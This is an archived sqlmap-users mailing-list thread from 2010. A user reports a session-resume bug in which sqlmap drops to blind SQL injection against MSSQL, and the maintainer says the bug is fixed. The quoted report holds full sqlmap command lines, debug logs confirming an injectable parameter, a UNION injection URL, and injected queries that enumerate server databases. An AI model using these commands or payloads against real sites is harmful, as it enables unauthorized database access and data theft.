Re: [sqlmap-users] Bug(?) with resuming/not resuming sessions with MSSQL (possible anothers dbms)
Brought to you by:
inquisb
From: Bernardo D. A. G. <ber...@gm...> - 2010-03-22 15:38:12
|
Fixed and committed. Thanks for reporting David. Bernardo On Fri, Mar 19, 2010 at 02:22, David Guimaraes <sk...@gm...> wrote: > When I try to run the sqlmap this way: > > # ./sqlmap.py --threads 20 -v 2 --union-use -u > "http://www.vulnsite.com/vulnasp.asp?prof=247&menu=vulnaspes&art=5021" > -p art --string WRAPED > > sqlmap/0.9-dev - automatic SQL injection and database takeover tool > http://sqlmap.sourceforge.net > > [*] starting at: 22:53:24 > > [22:53:24] [DEBUG] initializing the configuration > [22:53:24] [DEBUG] initializing the knowledge base > [22:53:24] [DEBUG] cleaning up configuration parameters > [22:53:24] [DEBUG] setting the HTTP timeout > [22:53:24] [DEBUG] setting the HTTP method to GET > [22:53:24] [DEBUG] creating HTTP requests opener object > [22:53:24] [DEBUG] parsing XML queries file > [22:53:24] [INFO] using > '/pentest/database/sqlmap8/output/www.vulnsite.com/session' as session > file > [22:53:24] [INFO] testing connection to the target url > [22:53:25] [INFO] testing if the provided string is within the target > URL page content > [22:53:29] [WARNING] the testable parameter 'art' you provided is not > into the Cookie > [22:53:29] [INFO] testing sql injection on GET parameter 'art' with 0 > parenthesis > [22:53:29] [INFO] testing unescaped numeric injection on GET parameter 'art' > [22:53:29] [DEBUG] got HTTP error code: 500 > [22:53:30] [DEBUG] got HTTP error code: 500 > [22:53:30] [INFO] confirming unescaped numeric injection on GET parameter 'art' > [22:53:30] [DEBUG] got HTTP error code: 500 > [22:53:30] [INFO] GET parameter 'art' is unescaped numeric injectable > with 0 parenthesis > [22:53:30] [INFO] testing for parenthesis on injectable parameter > [22:53:31] [DEBUG] got HTTP error code: 500 > [22:53:31] [DEBUG] got HTTP error code: 500 > [22:53:32] [DEBUG] got HTTP error code: 500 > [22:53:32] [INFO] the injectable parameter requires 0 parenthesis > [22:53:32] [INFO] testing MySQL > [22:53:32] [DEBUG] got HTTP error code: 500 > [22:53:32] [WARNING] the back-end DMBS is not MySQL > [22:53:32] [INFO] testing Oracle > [22:53:33] [DEBUG] got HTTP error code: 500 > [22:53:33] [WARNING] the back-end DMBS is not Oracle > [22:53:33] [INFO] testing PostgreSQL > [22:53:33] [DEBUG] got HTTP error code: 500 > [22:53:33] [WARNING] the back-end DMBS is not PostgreSQL > [22:53:33] [INFO] testing Microsoft SQL Server > [22:53:34] [DEBUG] got HTTP error code: 500 > [22:53:34] [INFO] confirming Microsoft SQL Server > [22:53:35] [DEBUG] got HTTP error code: 500 > [22:53:35] [DEBUG] got HTTP error code: 500 > [22:53:35] [INFO] the back-end DBMS is Microsoft SQL Server > web server operating system: Windows 2000 > web application technology: ASP.NET, Microsoft IIS 6.0, ASP > back-end DBMS: Microsoft SQL Server 2005 > > [22:53:35] [INFO] testing inband sql injection on parameter 'art' with > NULL bruteforcing technique > [22:53:39] [DEBUG] got HTTP error code: 500 > [22:53:39] [DEBUG] got HTTP error code: 500 > [22:53:40] [DEBUG] got HTTP error code: 500 > [22:53:40] [DEBUG] got HTTP error code: 500 > [22:53:44] [DEBUG] got HTTP error code: 500 > [22:53:44] [DEBUG] got HTTP error code: 500 > [22:53:44] [INFO] confirming full inband sql injection on parameter 'art' > [22:53:45] [DEBUG] got HTTP error code: 500 > [22:53:45] [DEBUG] got HTTP error code: 500 > [22:53:46] [DEBUG] got HTTP error code: 500 > [22:53:46] [DEBUG] got HTTP error code: 500 > [22:53:47] [DEBUG] got HTTP error code: 500 > [22:53:47] [DEBUG] got HTTP error code: 500 > [22:53:47] [WARNING] the target url is not affected by an exploitable > full inband sql injection vulnerability > [22:53:47] [INFO] confirming partial (single entry) inband sql > injection on parameter 'art' by appending a false condition after the > parameter value > [22:53:48] [DEBUG] got HTTP error code: 500 > [22:53:49] [DEBUG] got HTTP error code: 500 > [22:53:49] [DEBUG] got HTTP error code: 500 > [22:53:49] [INFO] the target url is affected by an exploitable partial > (single entry) inband sql injection vulnerability > valid union: > 'http://www.vulnsite.com:80/vulnasp.asp?prof=247&menu=vulnaspes&art=5021%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20AND%206410=6410' > > [22:53:49] [INFO] Fetched data logged to text files under > '/pentest/database/sqlmap8/output/www.vulnsite.com' > > [*] shutting down at: 22:53:49 > > > > > > > > > > > He notes correctly UNIONSQLi and ends OK. Soon after that, I try to > recover the database by including only the argument "--dbs" and he can > not recover in advance with the UNIONSQLi strange reason described > below and to the BLINDSQLi. He tries to find the right table name > without first knowing how many there really are through the use of the > UNIONSQLi and direct try to find out how many there are and their > names using the BLINDSQLi. > > Example with resume: > > # ./sqlmap.py --threads 20 -v 2 --union-use -u > "http://www.vulnsite.com/professor.asp?prof=247&menu=professores&art=5021" > -p art --string WRAPED --dbs > > sqlmap/0.9-dev - automatic SQL injection and database takeover tool > http://sqlmap.sourceforge.net > > [*] starting at: 22:54:40 > > [22:54:40] [DEBUG] initializing the configuration > [22:54:40] [DEBUG] initializing the knowledge base > [22:54:40] [DEBUG] cleaning up configuration parameters > [22:54:40] [DEBUG] setting the HTTP timeout > [22:54:40] [DEBUG] setting the HTTP method to GET > [22:54:40] [DEBUG] creating HTTP requests opener object > [22:54:40] [DEBUG] parsing XML queries file > [22:54:40] [INFO] using > '/pentest/database/sqlmap8/output/www.vulnsite.com/session' as session > file > [22:54:40] [INFO] resuming string match 'WRAPED' from session file > [22:54:40] [INFO] resuming injection point 'GET' from session file > [22:54:40] [INFO] resuming injection parameter 'art' from session file > [22:54:40] [INFO] resuming injection type 'numeric' from session file > [22:54:40] [INFO] resuming 0 number of parenthesis from session file > [22:54:40] [INFO] resuming back-end DBMS 'microsoft sql server 2005' > from session file > [22:54:40] [INFO] resuming union comment '--' from session file > [22:54:40] [INFO] resuming union count 6 from session file > [22:54:40] [INFO] resuming union position 2 from session file > [22:54:40] [INFO] testing connection to the target url > [22:54:43] [WARNING] the testable parameter 'art' you provided is not > into the Cookie > [22:54:43] [INFO] testing for parenthesis on injectable parameter > [22:54:43] [DEBUG] skipping test for MySQL > [22:54:43] [DEBUG] skipping test for Oracle > [22:54:43] [DEBUG] skipping test for PostgreSQL > [22:54:43] [INFO] the back-end DBMS is Microsoft SQL Server > web server operating system: Windows 2000 > web application technology: ASP.NET, Microsoft IIS 6.0, ASP > back-end DBMS: Microsoft SQL Server 2005 > > [22:54:43] [INFO] fetching database names > [22:54:43] [DEBUG] query: UNION ALL SELECT NULL, NULL, > CHAR(116)+CHAR(104)+CHAR(116)+CHAR(78)+CHAR(80)+CHAR(119)+ISNULL(CAST(name > AS VARCHAR(8000)), > CHAR(32))+CHAR(106)+CHAR(86)+CHAR(81)+CHAR(97)+CHAR(77)+CHAR(109), > NULL, NULL, NULL FROM master..sysdatabases-- AND 2796=2796 > [22:54:44] [DEBUG] got HTTP error code: 500 > [22:54:45] [WARNING] for some reasons it was not possible to retrieve > the query output through inband SQL injection technique, sqlmap is > going blind > [22:54:45] [INFO] fetching number of databases > [22:54:45] [DEBUG] query: SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) > AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases > [22:54:45] [INFO] retrieved: [22:54:47] [DEBUG] got HTTP error code: 500 > [22:54:48] [DEBUG] got HTTP error code: 500 > . > . > . > [23:12:13] [DEBUG] performed 42 queries in 16 seconds > available databases [3]: > [*] mXX > [*] pXX > [*] tXX > > [23:12:13] [INFO] Fetched data logged to text files under > '/pentest/database/sqlmap8/output/www.vulnsite.com' > > [*] shutting down at: 23:12:13 > > > > > > > > > > > > But if I delete the session and send the sqlmap start over with the > "--dbs" activated, it correctly retrieves how many databases and their > names using the correct technique (UNIONSQLi). > > Example without resume (using --dbs first time): > # rm -rf output/* > # ./sqlmap.py --threads 20 -v 2 --union-use -u > "http://www.vulnsite.com/professor.asp?prof=247&menu=professores&art=5021" > -p art --string WRAPED --dbs > > sqlmap/0.9-dev - automatic SQL injection and database takeover tool > http://sqlmap.sourceforge.net > > [*] starting at: 23:16:02 > > [23:16:02] [DEBUG] initializing the configuration > [23:16:02] [DEBUG] initializing the knowledge base > [23:16:02] [DEBUG] cleaning up configuration parameters > [23:16:02] [DEBUG] setting the HTTP timeout > [23:16:02] [DEBUG] setting the HTTP method to GET > [23:16:02] [DEBUG] creating HTTP requests opener object > [23:16:02] [DEBUG] parsing XML queries file > [23:16:02] [INFO] using > '/pentest/database/sqlmap8/output/www.vulnsite.com/session' as session > file > [23:16:02] [INFO] testing connection to the target url > [23:16:02] [INFO] testing if the provided string is within the target > URL page content > [23:16:03] [WARNING] the testable parameter 'art' you provided is not > into the Cookie > [23:16:03] [INFO] testing sql injection on GET parameter 'art' with 0 > parenthesis > [23:16:03] [INFO] testing unescaped numeric injection on GET parameter 'art' > [23:16:04] [DEBUG] got HTTP error code: 500 > [23:16:04] [DEBUG] got HTTP error code: 500 > [23:16:04] [INFO] confirming unescaped numeric injection on GET parameter 'art' > [23:16:05] [DEBUG] got HTTP error code: 500 > [23:16:05] [INFO] GET parameter 'art' is unescaped numeric injectable > with 0 parenthesis > [23:16:05] [INFO] testing for parenthesis on injectable parameter > [23:16:05] [DEBUG] got HTTP error code: 500 > [23:16:05] [DEBUG] got HTTP error code: 500 > [23:16:06] [DEBUG] got HTTP error code: 500 > [23:16:06] [INFO] the injectable parameter requires 0 parenthesis > [23:16:06] [INFO] testing MySQL > [23:16:06] [DEBUG] got HTTP error code: 500 > [23:16:06] [WARNING] the back-end DMBS is not MySQL > [23:16:06] [INFO] testing Oracle > [23:16:07] [DEBUG] got HTTP error code: 500 > [23:16:07] [WARNING] the back-end DMBS is not Oracle > [23:16:07] [INFO] testing PostgreSQL > [23:16:07] [DEBUG] got HTTP error code: 500 > [23:16:07] [WARNING] the back-end DMBS is not PostgreSQL > [23:16:07] [INFO] testing Microsoft SQL Server > [23:16:08] [DEBUG] got HTTP error code: 500 > [23:16:08] [INFO] confirming Microsoft SQL Server > [23:16:14] [DEBUG] got HTTP error code: 500 > [23:16:15] [DEBUG] got HTTP error code: 500 > [23:16:15] [INFO] the back-end DBMS is Microsoft SQL Server > web server operating system: Windows 2000 > web application technology: ASP.NET, Microsoft IIS 6.0, ASP > back-end DBMS: Microsoft SQL Server 2005 > > [23:16:15] [INFO] testing inband sql injection on parameter 'art' with > NULL bruteforcing technique > [23:16:15] [DEBUG] got HTTP error code: 500 > [23:16:15] [DEBUG] got HTTP error code: 500 > [23:16:16] [DEBUG] got HTTP error code: 500 > [23:16:16] [DEBUG] got HTTP error code: 500 > [23:16:16] [DEBUG] got HTTP error code: 500 > [23:16:17] [DEBUG] got HTTP error code: 500 > [23:16:17] [INFO] confirming full inband sql injection on parameter 'art' > [23:16:17] [DEBUG] got HTTP error code: 500 > [23:16:18] [DEBUG] got HTTP error code: 500 > [23:16:18] [DEBUG] got HTTP error code: 500 > [23:16:19] [DEBUG] got HTTP error code: 500 > [23:16:19] [DEBUG] got HTTP error code: 500 > [23:16:20] [DEBUG] got HTTP error code: 500 > [23:16:20] [WARNING] the target url is not affected by an exploitable > full inband sql injection vulnerability > [23:16:20] [INFO] confirming partial (single entry) inband sql > injection on parameter 'art' by appending a false condition after the > parameter value > [23:16:21] [DEBUG] got HTTP error code: 500 > [23:16:22] [DEBUG] got HTTP error code: 500 > [23:16:27] [DEBUG] got HTTP error code: 500 > [23:16:27] [INFO] the target url is affected by an exploitable partial > (single entry) inband sql injection vulnerability > valid union: > 'http://www.vulnsite.com:80/professor.asp?prof=247&menu=professores&art=5021%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20AND%20716=716' > > [23:16:27] [INFO] fetching database names > [23:16:27] [DEBUG] query: UNION ALL SELECT NULL, NULL, > CHAR(84)+CHAR(116)+CHAR(77)+CHAR(114)+CHAR(107)+CHAR(90)+ISNULL(CAST(COUNT(name) > AS VARCHAR(8000)), > CHAR(32))+CHAR(72)+CHAR(73)+CHAR(66)+CHAR(90)+CHAR(76)+CHAR(101), > NULL, NULL, NULL FROM master..sysdatabases-- AND 2578=2578 > [23:16:28] [DEBUG] got HTTP error code: 500 > [23:16:28] [DEBUG] performed 1 queries in 0 seconds > [23:16:28] [INFO] the SQL query provided returns 3 entries > [23:16:28] [DEBUG] query: UNION ALL SELECT NULL, NULL, > CHAR(84)+CHAR(116)+CHAR(77)+CHAR(114)+CHAR(107)+CHAR(90)+ISNULL(CAST(name > AS VARCHAR(8000)), > CHAR(32))+CHAR(72)+CHAR(73)+CHAR(66)+CHAR(90)+CHAR(76)+CHAR(101), > NULL, NULL, NULL FROM master..sysdatabases WHERE name NOT IN (SELECT > TOP 0 name FROM master..sysdatabases)-- AND 7328=7328 > [23:16:31] [DEBUG] got HTTP error code: 500 > [23:16:31] [DEBUG] performed 2 queries in 3 seconds > [23:16:31] [DEBUG] query: UNION ALL SELECT NULL, NULL, > CHAR(84)+CHAR(116)+CHAR(77)+CHAR(114)+CHAR(107)+CHAR(90)+ISNULL(CAST(name > AS VARCHAR(8000)), > CHAR(32))+CHAR(72)+CHAR(73)+CHAR(66)+CHAR(90)+CHAR(76)+CHAR(101), > NULL, NULL, NULL FROM master..sysdatabases WHERE name NOT IN (SELECT > TOP 1 name FROM master..sysdatabases)-- AND 1346=1346 > [23:16:32] [DEBUG] got HTTP error code: 500 > [23:16:32] [DEBUG] performed 3 queries in 0 seconds > [23:16:32] [DEBUG] query: UNION ALL SELECT NULL, NULL, > CHAR(84)+CHAR(116)+CHAR(77)+CHAR(114)+CHAR(107)+CHAR(90)+ISNULL(CAST(name > AS VARCHAR(8000)), > CHAR(32))+CHAR(72)+CHAR(73)+CHAR(66)+CHAR(90)+CHAR(76)+CHAR(101), > NULL, NULL, NULL FROM master..sysdatabases WHERE name NOT IN (SELECT > TOP 2 name FROM master..sysdatabases)-- AND 231=231 > [23:16:33] [DEBUG] got HTTP error code: 500 > [23:16:33] [DEBUG] performed 4 queries in 1 seconds > available databases [3]: > [*] mXX > [*] pXX > [*] tXX > > [23:16:33] [INFO] Fetched data logged to text files under > '/pentest/database/sqlmap8/output/www.vulnsite.com' > > [*] shutting down at: 23:16:33 > > > > > > > > > > > > The same thing happens if I send sqlmap to dump the tables (--tables). > If I do not pass --tables the first time it runs and discovers the > vulnerability, when it runs again with the resumed file, it just go > right for BLINDSQLi, taking much longer to complete the task! > > > > -- > David Gomes Guimarães > > ------------------------------------------------------------------------------ > Download Intel® Parallel Studio Eval > Try the new software tools for yourself. Speed compiling, find bugs > proactively, and fine-tune applications for parallel performance. > See why Intel Parallel Studio got high marks during beta. > http://p.sf.net/sfu/intel-sw-dev > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: 0x05F5A30F |